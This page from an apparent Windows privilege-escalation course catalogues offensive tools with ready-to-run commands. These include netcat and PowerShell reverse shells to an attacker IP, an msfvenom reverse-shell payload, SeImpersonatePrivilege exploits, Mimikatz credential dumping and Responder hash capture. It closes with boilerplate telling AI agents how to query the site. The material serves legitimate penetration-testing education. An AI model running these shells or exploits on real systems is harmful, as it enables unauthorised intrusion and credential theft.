# 16 - Useful Tools

#### Topics <a href="#topics" id="topics"></a>

> 1. Introduction to the Windows Shells
> 2. Windows Permissions
> 3. Reverse Shells in Windows
> 4. SeImpersonatePrivilege Exploitation
> 5. On Cross Compilation
> 6. Windows Services
> 7. Weak Service Permissions
> 8. Unquoted Service Path
> 9. DLL Hijacking
> 10. Always Install Elevated
> 11. Files with Sensitive Data
> 12. Windows Hashes
> 13. Stored Credentials and the Windows Vault
> 14. Scheduled Task
> 15. Critical Registry Paths
> 16. Useful Tools
> 17. AMSI Bypass

## **Why Do We Use Tools?**

In the field of cybersecurity, tools play a crucial role in automating repetitive, complex, or otherwise resource-intensive tasks. They help professionals save **time** and **effort**, which are often limited during assessments or incidents. A good tool should:

1. Clearly define its purpose and scope.
2. Be simple to use relative to its functionality.
3. Integrate seamlessly into automation workflows.
4. Provide concise and clear output.
5. Remain minimalistic, avoiding unnecessary features.
6. Be well-documented and, if possible, modifiable for specific needs.

### **Why Mindset Matters**

While tools are powerful, understanding the underlying concepts they automate remains essential. This knowledge ensures that you can:

* Customize tools to your needs.
* Develop solutions in environments where tools are unavailable.
* Mitigate tool-related detection by defenders during offensive operations.

*The best tool is always a well-trained mind.*

***

## **Useful Tools (Windows)**

### **Certutil**

Built-in Windows utility often used for certificate management. It can also download files:

```bash
certutil -urlcache -split -f <URL> <OUTPUT-FILE>
certutil -urlcache -split -f https://example.com/file.txt file.txt
```

***

### **Invoke-WebRequest (iwr)**

PowerShell cmdlet to download files:

```powershell
iwr -uri <URL> -OutFile <OUTPUT-FILE>
iwr -uri https://example.com/file.txt -OutFile file.txt
```

***

### **Netcat (nc)**

A versatile networking tool for creating reverse shells, listening ports, and file transfers. Example for reverse shell:

```powershell
iwr -uri https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe -Outfile netcat64.exe
nc -lvnp 4321 (listener)
.\netcat64.exe <ATTACKER-IP> 4321 -e cmd.exe (on target)
```

***

### **Invoke-PowerShellTcp**

A PowerShell reverse shell script:

```powershell
iwr -uri https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 -Outfile Invoke-PowerShellTcp.ps1
. .\Invoke-PowerShellTcp
Invoke-PowerShellTcp -Reverse -IPAddress <ATTACKER-IP> -Port <PORT>
```

***

### **Msfvenom**

Tool for generating payloads. Example for a reverse shell:

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=<ATTACKER-IP> LPORT=<PORT> -f exe -o malicious.exe
```

***

**MinGW32**

A cross-compiler for building Windows binaries from Linux. Example of building a basic program:

```c
#include <stdio.h>
int main() { printf("Hello World!\n"); return 0; }
```

Compile using:

```bash
x86_64-w64-mingw32-gcc -o hello.exe hello.c
```

***

### **PrintSpoofer**

Exploit for abusing the `SeImpersonatePrivilege:`

```powershell
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
.\PrintSpoofer64.exe -c "cmd.exe"
```

***

### **GodPotato**

Similar to PrintSpoofer, used for exploiting `SeImpersonatePrivilege`:

```powershell
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
.\GodPotato-NET2.exe -cmd "cmd.exe"
```

***

### **WinPEAS**

Windows Privilege Escalation Awesome Script:

```powershell
iwr -uri https://github.com/peass-ng/PEASS-ng/releases/download/20241205-c8c0c3e5/winPEASx64.exe -Outfile winPEASx64.exe
.\winPEASx64.exe quiet
```

***

### **PowerUp**

PowerShell script for auditing privilege escalation:

```powershell
iwr -uri https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 -Outfile PowerUp.ps1
Import-Module .\PowerUp.ps1
Invoke-PrivescAudit -HTMLReport
```

***

### **PrivescCheck**

Identifies misconfigurations leading to privilege escalation:

```powershell
iwr -uri "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/release/PrivescCheck.ps1" -Outfile PrivescCheck.ps1
powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended"
```

***

### **BeRoot**

Post-exploitation script for privilege escalation checks:

```powershell
iwr -uri "https://github.com/AlessandroZ/BeRoot/releases/download/1.0.1/beRoot.zip" -Outfile beRoot.zip
.\beRoot.exe
```

***

### **Mimikatz**

Advanced credential-dumping tool:

```powershell
iwr -uri "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip" -Outfile mimikatz_trunk.zip
.\mimikatz.exe
```

***

### **Impacket**

Python library for working with Windows protocols:

```bash
pip install impacket
impacket-smbclient <TARGET-IP>
```

***

### **Responder**

Poisoning tool for capturing hashes:

```bash
git clone https://github.com/lgandx/Responder
sudo python3 Responder.py -I <INTERFACE>
```

***

### **Chisel**

TCP/UDP tunneling tool for pivoting:

```bash
chisel server -p 8080 --reverse
chisel client <SERVER-IP>:8080 R:1080:127.0.0.1:80
```

***

### **Hashcat and John the Ripper**

Tools for cracking passwords and hashes:

```bash
hashcat -m 1000 -a 0 hash.txt rockyou.txt
john --format=nt --wordlist=rockyou.txt hash.txt
```

***

### **CrackMapExec**

Network exploitation and post-exploitation framework:

```bash
crackmapexec smb <TARGET-IP>
```

{% hint style="danger" %}
**Disclaimer**

**❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!**❗
{% endhint %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://dev-angelist.gitbook.io/windows-privilege-escalation/16-useful-tools.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.